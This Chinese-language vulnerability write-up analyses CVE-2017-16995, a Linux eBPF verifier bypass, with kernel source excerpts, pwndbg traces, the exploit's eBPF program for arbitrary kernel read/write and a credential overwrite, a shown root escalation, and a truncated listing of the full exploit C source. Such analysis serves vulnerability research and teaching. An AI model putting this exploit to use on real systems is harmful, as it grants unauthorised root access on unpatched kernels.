# Ubuntu kernel eBPF(CVE-2017-16995) ## 前言 关于这个漏洞网上已经有很多相关原理的分析,但大多主要以[Vitaly Nikolenko](https://twitter.com/vnik5287/status/974277953394651137)的exp来分析,其中涉及了对exp中ebpf字节码进行逆向的问题,对于分析漏洞利用过程并不是十分直观。本篇文章以[Bruce Leidl](https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c)的exp进行分析,个人认为相比前者流程更加清晰直观,便于理解。 ## 环境搭建 本次复现使用[Linux_kernel-4.4.33](https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/linux-4.4.33.tar.gz),在编译前开启CONFIG_BPF、CONFIG_BPF_SYSCALL 和CONFIG_DEBUG_INFO。 ## extended BPF eBPF(extended Berkeley Packet Filter)是内核源自于BPF的一套包过滤机制,eBPF的功能已经不仅仅局限于网络包过滤,利用它可以实现kernel tracing,traffic control,应用性能监控等强大功能。eBPF提供了一套类似RISC的指令集,并实现了该指令集的虚拟机,使用者通过内核API向eBPF提交指令代码来完成特定的功能。 eBPF虚拟指令系统属于RISC,拥有11个虚拟寄存器(r0-r10),在实际运行时,虚拟机会把这11个寄存器一一对应于硬件CPU的11个物理寄存器,以x64为例,对应关系如下: //R0 - 保存返回值 //R1-R5 参数传递 //R6-R9 保存临时变量 //R10 只读,用做栈指针 R0 – rax R1 - rdi R2 - rsi R3 - rdx R4 - rcx R5 - r8 R6 - rbx R7 - r13 R8 - r14 R9 - r15 R10 – rbp(帧指针,frame pointer) 每一条指令的格式如下: ```c //source/include/uapi/linux/bpf.h#L58 struct bpf_insn { __u8 code; /* opcode */ __u8 dst_reg:4; /* dest register */ __u8 src_reg:4; /* source register */ __s16 off; /* signed offset */ __s32 imm; /* signed immediate constant */ }; ``` 例如BPF指令:`BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF)`其数据结构为: ```c //source/include/linux/filter.h#L124 #define BPF_MOV32_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) ``` 转换成字节码为:`\xb4\x09\x00\x00\xff\xff\xff\xff`。 可通过如下程序对eBPF字节码进行转换: [1]https://github.com/dangokyo/CVE_2017_16995/blob/master/disassembler.c [2]https://github.com/ret2p4nda/kernel-pwn/blob/master/CVE-2017-16995/epbf_tools.py ## 漏洞分析 简单来说漏洞点是在BPF模拟执行检测时的代码实现和实际运行时的代码实现不同,导致了经过构造的BPF指令绕过检测从而执行恶意代码。 ### verifier机制绕过 #### eBPF检测时(do_check() ) 我们首先来看如何绕过eBPF的verifier机制,exp中代码如下: ``` #define BPF_DISABLE_VERIFIER() \ BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \ BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \
BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \ BPF_EXIT_INSN() /* } */ \ ``` 第一行的eBPF操作码为`BPF_ALU | BPF_MOV | BPF_K`,verifier 会对ALU指令用`check_alu_op`函数进行检查。 该函数调用路径为: ```shell #0 0xffffffff8116719b in check_alu_op (insn=, env=) at kernel/bpf/verifier.c:1097 #1 do_check (env=) at kernel/bpf/verifier.c:1765 #2 bpf_check (prog=, attr=) at kernel/bpf/verifier.c:2258 #3 0xffffffff81163d4e in bpf_prog_load (attr=0xffff88000d94fef0) at kernel/bpf/syscall.c:679 #4 0xffffffff8116456e in SYSC_bpf (size=48, uattr=, cmd=) at kernel/bpf/syscall.c:783 #5 SyS_bpf (cmd=5, uattr=140726845938864, size=72) at kernel/bpf/syscall.c:725 #6 0xffffffff817ef672 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:185 ``` 该函数最后一个`else`是将立即数赋值给寄存器,然而其并没有对`BPF_ALU64|BPF_MOV|BPF_K`和`BPF_ALU|BPF_MOV|BPF_K`两个指令做区分。直接把用户指令中的立即数`insn->imm`赋值给了目的寄存器,`insn->imm`和目的寄存器的类型都是int。 ```shell LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────── RAX 0x90 RBX 0xffff88000d950018 ◂— 0 RCX 0x0 RDX 0xffffffff RDI 0xffff88000d950018 ◂— 0 RSI 0xffff88000d9500a8 ◂— 8 R8 0xa R9 0xfffc R10 0xb R11 0xffffc9000009301b ◂— 0xa /* '\n' */ R12 0x0 R13 0xffffc90000002028 ◂— 0xffffffff000009b4 R14 0xb0 R15 0xffff88000d950000 —▸ 0xffffc90000002000 ◂— 0x2900020001 RBP 0xffff88000d94fe18 —▸ 0xffff88000d94fed0 —▸ 0xffff88000d94ff48 —▸ 0x7ffd85a99d00 —▸ 0x7ffd85a99d10 ◂— ... 
RSP 0xffff88000d94fd90 ◂— 0xffffffff RIP 0xffffffff8116719b (bpf_check+6715) ◂— 0xca870ffffff237e9 ──────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0xffffffff81167187 movzx eax, byte ptr [r13 + 1] 0xffffffff8116718c mov edx, dword ptr [r13 + 4] 0xffffffff81167190 and eax, irq_stack_union+15 <15> 0xffffffff81167193 shl rax, 4 <4> 0xffffffff81167197 mov dword ptr [rbx + rax + 8], edx ► 0xffffffff8116719b jmp bpf_check+3191 <0xffffffff811663d7> ↓ 0xffffffff811663d7 add r12d, 1 0xffffffff811663db jmp bpf_check+2633 <0xffffffff811661a9> ↓ 0xffffffff811661a9 cmp dword ptr [rsp + 0x38], r12d 0xffffffff811661ae jle bpf_check+6091 <0xffffffff81166f2b> 0xffffffff811661b4 mov rax, qword ptr [rsp + 0x30] ────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────── In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/verifier.c 1091 } 1092 } else { 1093 /* case: R = imm 1094 * remember the value we stored into this reg 1095 */ 1096 regs[insn->dst_reg].type = CONST_IMM; ► 1097 regs[insn->dst_reg].imm = insn->imm; 1098 } 1099 1100 } else if (opcode > BPF_END) { 1101 verbose("invalid BPF_ALU opcode %x\n", opcode); ────────────────────────────────────────[ STACK ]────────────────────────────────────────────── 00:0000│ rsp 0xffff88000d94fd90 ◂— 0xffffffff 01:0008│ 0xffff88000d94fd98 ◂— jnp 0xffff88000d94fd3c /* 0xa27b */ 02:0010│ 0xffff88000d94fda0 ◂— 0x95 03:0018│ 0xffff88000d94fda8 ◂— 0 04:0020│ 0xffff88000d94fdb0 ◂— add byte ptr [rax], al /* 0x800000000000 */ 05:0028│ 0xffff88000d94fdb8 —▸ 0x6be540 ◂— 0 06:0030│ 0xffff88000d94fdc0 —▸ 0xffffc90000002028 ◂— 0xffffffff000009b4 07:0038│ 0xffff88000d94fdc8 —▸ 0xffff880000000029 ◂— xlatb /* 0x1ef000d71ef000d7 */ ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────── ► f 0 ffffffff8116719b bpf_check+6715 f 1 ffffffff8116719b bpf_check+6715 f 2 ffffffff8116719b bpf_check+6715 f 3 ffffffff81163d4e bpf_prog_load+590 f 4 
ffffffff8116456e sys_bpf+846 f 5 ffffffff8116456e sys_bpf+846 f 6 ffffffff817ef672 entry_SYSCALL_64+98 ─────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> x/10wx $rbx+$rax 0xffff88000d9500a8: 0x00000008 0x00000000 0xffffffff 0x00000000 0xffff88000d9500b8: 0x00000006 0x00000000 0x00000000 0x00000000 0xffff88000d9500c8: 0x00000000 0x00000000 ``` `$rbx+$rax`是 `reg_state`结构体类型的`reg`值,可见第一个字段值为8,第二个字段值为0xffffffff。结构体定义如下: ```c //kernel/bpf/verifier.c struct reg_state { enum bpf_reg_type type; union { /* valid when type == CONST_IMM | PTR_TO_STACK */ int imm; /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE | * PTR_TO_MAP_VALUE_OR_NULL */ struct bpf_map *map_ptr; }; }; //declaration of regs struct reg_state *regs = state->regs ``` 可以看到该结构体有2个字段,第一个为type,代表寄存器数据的类型,此处为`CONST_IMM`,`CONST_IMM`的值为8。另外一个为常量立即数的具体数值,可以看到类型为有符号整型。 `do_check()`在校验条件类跳转指令的时候,会判断条件是否成立,如果是非确定性跳转的话,就说明接下来2个分支都有可能执行(分支1和分支2),这时`do_check()`会把下一步需要跳转到的指令编号(分支2)放到一个临时栈中备用,这样当前指令顺序校验(分支1)过程中遇到`EXIT`指令时,会从临时栈中取出之前保存的下一条指令的序号(分支2)继续校验。**如果跳转条件的结果在校验时即可确定(例如本例中`JNE`的条件恒不成立,只会走直通分支, fall-through branch ),就不会再往临时栈中放入分支2,因为verifier认为分支2永远不会执行**。 下面这段代码是对`BPF_JMP|BPF_JNE|BPF_K`指令进行检查,这条指令的语义是:如果目的寄存器立即数==指令的立即数(`insn->imm`),程序继续执行,否则执行`pc+off`处的指令;注意判断立即数相等的条件,因为前面ALU指令对32bit和64bit integer不加区分,不论`imm`是否有符号,在这里都是相等的。 ```c //kernel/bpf/verifier.c#L1248 static int check_cond_jmp_op(struct verifier_env *env, struct bpf_insn *insn, int *insn_idx) { struct reg_state *regs = env->cur_state.regs; struct verifier_state *other_branch; u8 opcode = BPF_OP(insn->code); int err; ...
/* detect if R == 0 where R was initialized to zero earlier */ if (BPF_SRC(insn->code) == BPF_K && (opcode == BPF_JEQ || opcode == BPF_JNE) && regs[insn->dst_reg].type == CONST_IMM && regs[insn->dst_reg].imm == insn->imm) { if (opcode == BPF_JEQ) { /* if (imm == imm) goto pc+off; * only follow the goto, ignore fall-through */ *insn_idx += insn->off; return 0; } else { /* if (imm != imm) goto pc+off; * only follow fall-through branch, since * that's where the program will go */ return 0; } } other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx); ... } ``` 下面代码,是在校验`EXIT`指令时,会从临时栈中尝试取指令(调用`pop_stack()`函数),如果临时栈中有指令,那就说明还有其他可能执行到的分支,需要继续校验,如果取不到值,表示当前这条`EXIT`指令确实是BPF程序最后一条可以执行到的指令,此时`pop_stack()`会返回-1,然后跳出`do_check`校验循环,`do_check`执行结束,校验通过。 ```c //kernel/bpf/verifier.c#L1921 else if (class == BPF_JMP) { u8 opcode = BPF_OP(insn->code); ... } else if (opcode == BPF_EXIT) { if (BPF_SRC(insn->code) != BPF_K || insn->imm != 0 || insn->src_reg != BPF_REG_0 || insn->dst_reg != BPF_REG_0) { verbose("BPF_EXIT uses reserved fields\n"); return -EINVAL; } /* eBPF calling convetion is such that R0 is used * to return the value from eBPF program. * Make sure that it's readable at this time * of bpf_exit, which means that program wrote * something into it earlier */ err = check_reg_arg(regs, BPF_REG_0, SRC_OP); if (err) return err; if (is_pointer_value(env, BPF_REG_0)) { verbose("R0 leaks addr as return value\n"); return -EACCES; } process_bpf_exit: insn_idx = pop_stack(env, &prev_insn_idx); if (insn_idx < 0) { break; } else { do_print_state = true; continue; } } ... } ``` #### eBPF运行时(__bpf_prog_run() ) 运行第一行操作指令时,将操作码`BPF_ALU | BPF_MOV | BPF_K`对应为`ALU_MOV_K`。而64位的操作码`BPF_ALU64|BPF_MOV|BPF_K`对应为`ALU64_MOV_K`,定义代码如下: ```c //kernel/bpf/core.c static const void *jumptable[256] = { [0 ... 255] = &&default_label, ... [BPF_ALU | BPF_MOV | BPF_K] = &&ALU_MOV_K, ... [BPF_ALU64 | BPF_MOV | BPF_K] = &&ALU64_MOV_K, ... }; ... ALU_MOV_K: DST = (u32) IMM; CONT; ...
ALU64_MOV_K: DST = IMM; CONT; ``` 可以看出verifier检测时和eBPF运行时代码对于2条指令的语义解释并不一样,`DST`是64位寄存器,因此`ALU_MOV_K`得到的是一个32位的无符号整数,而`ALU64_MOV_K`会对`imm`进行符号扩展,得到一个64位有符号整数。 eBPF运行时对`BPF_JMP|BPF_JNE|BPF_K`指令的解释 ```c JMP_JNE_K: if (DST != IMM) { insn += insn->off; CONT_JMP; } CONT; ``` 当`imm`为有符号和无符号时,由于符号扩展,`DST!=IMM`结果是不一样的。 动态调试结果如下,可见实际执行时与模拟执行时跳转结果相反,最终执行了verifier未检查的eBPF代码。从而绕过了verifier检测机制。 ```shell LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────── RAX 0x9 RBX 0xffffc90000002030 ◂— 0xffffffff00020955 RCX 0x0 RDX 0xffffffffffffffff RDI 0xffff88000d961300 ◂— 0 RSI 0xffffffff R8 0x0 R9 0x0 R10 0x0 R11 0xffff88000d929000 ◂— 0 R12 0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748 R13 0x0 R14 0xffff88000d928c00 ◂— 0 R15 0xffff88000d94fdf0 ◂— 0 RBP 0xffff88000d94fce0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ... RSP 0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000 RIP 0xffffffff81162d2c (__bpf_prog_run+2028) ◂— 0xfffffd90c5943948 ───────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0xffffffff811631d0 <__bpf_prog_run+3216> movzx eax, byte ptr [rbx] 0xffffffff811631d3 <__bpf_prog_run+3219> jmp qword ptr [r12 + rax*8] ↓ 0xffffffff81162d21 <__bpf_prog_run+2017> movzx eax, byte ptr [rbx + 1] 0xffffffff81162d25 <__bpf_prog_run+2021> movsxd rdx, dword ptr [rbx + 4] 0xffffffff81162d29 <__bpf_prog_run+2025> and eax, irq_stack_union+15 <15> ► 0xffffffff81162d2c <__bpf_prog_run+2028> cmp qword ptr [rbp + rax*8 - 0x270], rdx 0xffffffff81162d34 <__bpf_prog_run+2036> je __bpf_prog_run+4992 <0xffffffff811638c0> 0xffffffff81162d3a <__bpf_prog_run+2042> movsx rax, word ptr [rbx + 2] 0xffffffff81162d3f <__bpf_prog_run+2047> lea rbx, [rbx + rax*8 + 8] 0xffffffff81162d44 <__bpf_prog_run+2052> movzx eax, byte ptr [rbx] 0xffffffff81162d47 <__bpf_prog_run+2055> 
jmp qword ptr [r12 + rax*8] ────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────── In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c 491 insn += insn->off; 492 CONT_JMP; 493 } 494 CONT; 495 JMP_JNE_K: ► 496 if (DST != IMM) { 497 insn += insn->off; 498 CONT_JMP; 499 } 500 CONT; 501 JMP_JGT_X: ────────────────────────────────────────[ STACK ]────────────────────────────────────────────── 00:0000│ rsp 0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000 01:0008│ 0xffff88000d94fa70 ◂— 0 02:0010│ 0xffff88000d94fa78 —▸ 0xffff88000d961300 ◂— 0 03:0018│ 0xffff88000d94fa80 ◂— 0 04:0020│ 0xffff88000d94fa88 —▸ 0xffff88000fd5c8d8 ◂— 0xffff88000fd5c8d8 05:0028│ 0xffff88000d94fa90 —▸ 0xffff88000fa1a208 —▸ 0xffffea000006f460 —▸ 0xffffea000006f420 —▸ 0xffffea000006f3e0 ◂— ... 06:0030│ 0xffff88000d94fa98 —▸ 0xffff88000fd5c780 ◂— 0x1c4 07:0038│ 0xffff88000d94faa0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ... 
──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────── ► f 0 ffffffff81162d2c __bpf_prog_run+2028 f 1 ffffffff81700a1b sk_filter+91 f 2 ffffffff81700a1b sk_filter+91 f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501 f 4 ffffffff816cec48 sock_sendmsg+56 f 5 ffffffff816cec48 sock_sendmsg+56 f 6 ffffffff816cece2 sock_write_iter+130 f 7 ffffffff811f7f09 __vfs_write+169 f 8 ffffffff811f7f09 __vfs_write+169 f 9 ffffffff811f8556 vfs_write+150 f 10 ffffffff811f9156 sys_write+70 ─────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> x/wx $rbp+$rax*8-0x270 0xffff88000d94fab8: 0xffffffff pwndbg> i r $rdx rdx 0xffffffffffffffff -1 ``` ### 组装eBPF指令 在绕过verifier检测机制后,需要组装一个eBPF指令用来做任意地址的读写。 首先来看exp中的实现,如下: ```c #define BPF_DISABLE_VERIFIER() \ BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \ BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \ BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \ BPF_EXIT_INSN() /* } */ \ #define BPF_MAP_GET(idx, dst) \ BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \ BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \ BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \ BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \ BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \ BPF_EXIT_INSN(), /* exit(0); */ \ BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */ static int load_prog() { struct bpf_insn prog[] = { BPF_DISABLE_VERIFIER(), BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16), /* *(fp - 16) = r1 */ BPF_LD_MAP_FD(BPF_REG_9, mapfd), /* r9 = mapfd */ //可以看出这个MAP的第一个元素为操作指令,第二个元素为需要读写的内存地址,第三个元素用来存放读取到的内容。 BPF_MAP_GET(0, BPF_REG_6), /* r6 = op */ BPF_MAP_GET(1, BPF_REG_7), /* r7 = address */ BPF_MAP_GET(2, BPF_REG_8), /* r8 = value */ /* store map slot address in r2 */ BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), /* r2 = 
r0 */ BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 for exit(0) */ BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2), /* if (op == 0) */ /* get fp */ BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0), BPF_EXIT_INSN(), BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3), /* else if (op == 1) */ /* get skbuff */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16), BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0), BPF_EXIT_INSN(), BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3), /* else if (op == 2) */ /* read */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0), BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0), BPF_EXIT_INSN(), /* else */ /* write */ BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), BPF_EXIT_INSN(), }; return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0); } ``` 之前已经分析过`BPF_DISABLE_VERIFIER()`的行为,继续往下分析。 首先将`rax`存入`rbp - 0x220`处,此处为exp中`fp`的值。将`rdi`存入`rbp-0x268`处,此处为exp中`BPF_REG_1`的值,并且`rdi`在源码中的定义为`struct sk_buff * skb`,这为后面覆写`skb->sk->sk_peer_cred`提权做铺垫。 ```shell LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────── RAX 0xb4 RBX 0xffffc90000002028 ◂— 0xffffffff000002b4 RCX 0x0 RDX 0xffff88000d9fc800 ◂— 0 RDI 0xffff88000da0e800 ◂— 0 RSI 0xffffc90000002028 ◂— 0xffffffff000002b4 R8 0x0 R9 0x0 R10 0x0 R11 0xffff88000d9fc800 ◂— 0 R12 0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748 R13 0x0 R14 0xffff88000d9fc400 ◂— 0 R15 0xffff88000da0bdf0 ◂— 0 RBP 0xffff88000da0bce0 —▸ 0xffff88000da0bd20 —▸ 0xffff88000da0bdc0 —▸ 0xffff88000da0bde0 —▸ 0xffff88000da0be50 ◂— ... 
RSP 0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000 RIP 0xffffffff81162577 (__bpf_prog_run+55) ◂— 0xfffffd9085c748 ───────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0xffffffff8116255c <__bpf_prog_run+28> xor r13d, r13d 0xffffffff8116255f <__bpf_prog_run+31> sub rsp, irq_stack_union+608 <0x260> 0xffffffff81162566 <__bpf_prog_run+38> mov qword ptr [rbp - 0x220], rax 0xffffffff8116256d <__bpf_prog_run+45> movzx eax, byte ptr [rsi] 0xffffffff81162570 <__bpf_prog_run+48> mov qword ptr [rbp - 0x268], rdi ► 0xffffffff81162577 <__bpf_prog_run+55> mov qword ptr [rbp - 0x270], 0 0xffffffff81162582 <__bpf_prog_run+66> mov qword ptr [rbp - 0x238], 0 0xffffffff8116258d <__bpf_prog_run+77> jmp qword ptr [r12 + rax*8] ↓ 0xffffffff811631ba <__bpf_prog_run+3194> movzx eax, byte ptr [rbx + 1] 0xffffffff811631be <__bpf_prog_run+3198> mov esi, dword ptr [rbx + 4] 0xffffffff811631c1 <__bpf_prog_run+3201> add rbx, 8 <8> ────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────── In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c 305 306 FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)]; 307 ARG1 = (u64) (unsigned long) ctx; 308 309 /* Registers used in classic BPF programs need to be reset first. 
*/ ► 310 regs[BPF_REG_A] = 0; 311 regs[BPF_REG_X] = 0; 312 313 select_insn: 314 goto *jumptable[insn->code]; 315 ────────────────────────────────────────[ STACK ]────────────────────────────────────────────── 00:0000│ rsp 0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000 01:0008│ 0xffff88000da0ba70 ◂— 0 02:0010│ 0xffff88000da0ba78 —▸ 0xffff88000da0e800 ◂— 0 03:0018│ 0xffff88000da0ba80 —▸ 0xffff88000d96c770 ◂— 0 04:0020│ 0xffff88000da0ba88 —▸ 0xffff88000da0e800 ◂— 0 05:0028│ 0xffff88000da0ba90 ◂— 0x158 06:0030│ 0xffff88000da0ba98 —▸ 0xffff88000fd07e00 —▸ 0xffff88000fd06780 ◂— 0x1c4 07:0038│ 0xffff88000da0baa0 ◂— 1 ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────── ► f 0 ffffffff81162577 __bpf_prog_run+55 f 1 ffffffff81700a1b sk_filter+91 f 2 ffffffff81700a1b sk_filter+91 f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501 f 4 ffffffff816cec48 sock_sendmsg+56 f 5 ffffffff816cec48 sock_sendmsg+56 f 6 ffffffff816cece2 sock_write_iter+130 f 7 ffffffff811f7f09 __vfs_write+169 f 8 ffffffff811f7f09 __vfs_write+169 f 9 ffffffff811f8556 vfs_write+150 f 10 ffffffff811f9156 sys_write+70 ─────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> x/gx $rbp-0x220 0xffff88000da0bac0: 0xffff88000da0bcc8 pwndbg> x/gx 0xffff88000da0bcc8 0xffff88000da0bcc8: 0xffff88000da0e800 pwndbg> x/gx $rbp-0x268 0xffff88000da0ba78: 0xffff88000da0e800 ``` `BPF_MAP_GET`的主要流程为:在此之前`BPF_LD_MAP_FD`已将`mapfd`放到`r9`;将`r9`放到`r1`,作为后续调用`BPF_FUNC_map_lookup_elem`函数的第一个参数;将`fp`赋值给`r2`并减4,即在栈上留出4个字节的空间,使`r2`指向`fp-4`,作为第二个参数(key的指针);将MAP元素的序号(`idx`)写入`fp-4`处;调用`BPF_FUNC_map_lookup_elem`查找map中第`idx`个元素,并把返回值(该元素值的地址)存入r0;判断`BPF_FUNC_map_lookup_elem`是否执行成功,若r0为0则直接退出;成功后执行最后一条指令,从r0指向的地址读取8字节,将取到的值放到目标寄存器(`dst`)中。 后面根据`op`的取值定义了四个命令:`op==0`获取`fp`(内核栈地址);`op==1`获取`sk_buff`地址;`op==2`任意地址读;其余取值(exp中使用3)任意地址写。 ### 提权 覆写`sk`中的`sk_peer_cred`使其内部与uid相关值置0。由于每个内核版本`sk_peer_cred`偏移不同,可以先搜索`sk_rcvtimeo = 9223372036854775807`找到其偏移再减8即为`sk_peer_cred`的偏移。 ```shell pwndbg> p *((struct sk_buff *)0xffff88000da0e800) $1 = { { { next = 0x0 , prev = 0x0 , { tstamp = {
tv64 = 0 }, skb_mstamp = { { v64 = 0, { stamp_us = 0, stamp_jiffies = 0 } } } } }, rbnode = { __rb_parent_color = 0, rb_right = 0x0 , rb_left = 0x0 } }, sk = 0xffff88000d9fc400, ... } pwndbg> p *((struct sock*)0xffff88000d9fc400) $2 = { ... sk_peer_pid = 0xffff88000d96cd00, sk_peer_cred = 0xffff88000d9f9c00, sk_rcvtimeo = 9223372036854775807, sk_sndtimeo = 9223372036854775807, ... } ``` 运行结果: ```shell / $ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) / $ ./get-rekt-linux-hardened [.] [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t) [.] [.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel ** [.] [*] creating bpf map [*] sneaking evil bpf past the verifier [*] creating socketpair() [*] attaching bpf backdoor to socket uid:3e8 [*] Leaking skbuff addr from ffff88000d9f9400 [*] Leaking sock struct from ffff88000da16400 [*] found sock->sk_rcvtimeo at offset 472 [*] found sock->sk_peer_cred [*] hammering cred structure at ffff88000da10780 [*] credentials patched, launching shell... 
/ # id uid=0(root) gid=0(root) groups=1000(ctf) ``` ## EXP 完整exp如下: ```c #include <errno.h> #include <fcntl.h> #include <stdarg.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/bpf.h> #include <linux/unistd.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/stat.h> #include <stdint.h> char buffer[64]; int sockets[2]; int mapfd, progfd; int doredact = 0; #define LOG_BUF_SIZE 65536 char bpf_log_buf[LOG_BUF_SIZE]; static __u64 ptr_to_u64(void *ptr) { return (__u64) (unsigned long) ptr; } int bpf_prog_load(enum bpf_prog_type prog_type, const struct bpf_insn *insns, int prog_len, const char *license, int kern_version) { union bpf_attr attr = { .prog_type = prog_type, .insns = ptr_to_u64((void *) insns), .insn_cnt = prog_len / sizeof(struct bpf_insn), .license = ptr_to_u64((void *) license), .log_buf = ptr_to_u64(bpf_log_buf), .log_size = LOG_BUF_SIZE, .log_level = 1, }; attr.kern_version = kern_version; bpf_log_buf[0] = 0; return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); } int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size, int max_entries, int map_flags) { union bpf_attr attr = { .map_type = map_type, .key_size = key_size, .value_size = value_size, .max_entries = max_entries }; return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)); } int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags) { union bpf_attr attr = { .map_fd = fd, .key = ptr_to_u64(key), .value = ptr_to_u64(value), .flags = flags, }; return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)); } int bpf_lookup_elem(int fd, void *key, void *value) { union bpf_attr attr = { .map_fd = fd, .key = ptr_to_u64(key), .value = ptr_to_u64(value), }; return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)); } #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0,
\ .imm = 0 }) #define BPF_MOV32_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_MOV32_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_LD_IMM64(DST, IMM) \ BPF_LD_IMM64_RAW(DST, 0, IMM) #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32) (IMM) }), \ ((struct bpf_insn) { \ .code = 0, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64) (IMM)) >> 32 }) #ifndef BPF_PSEUDO_MAP_FD 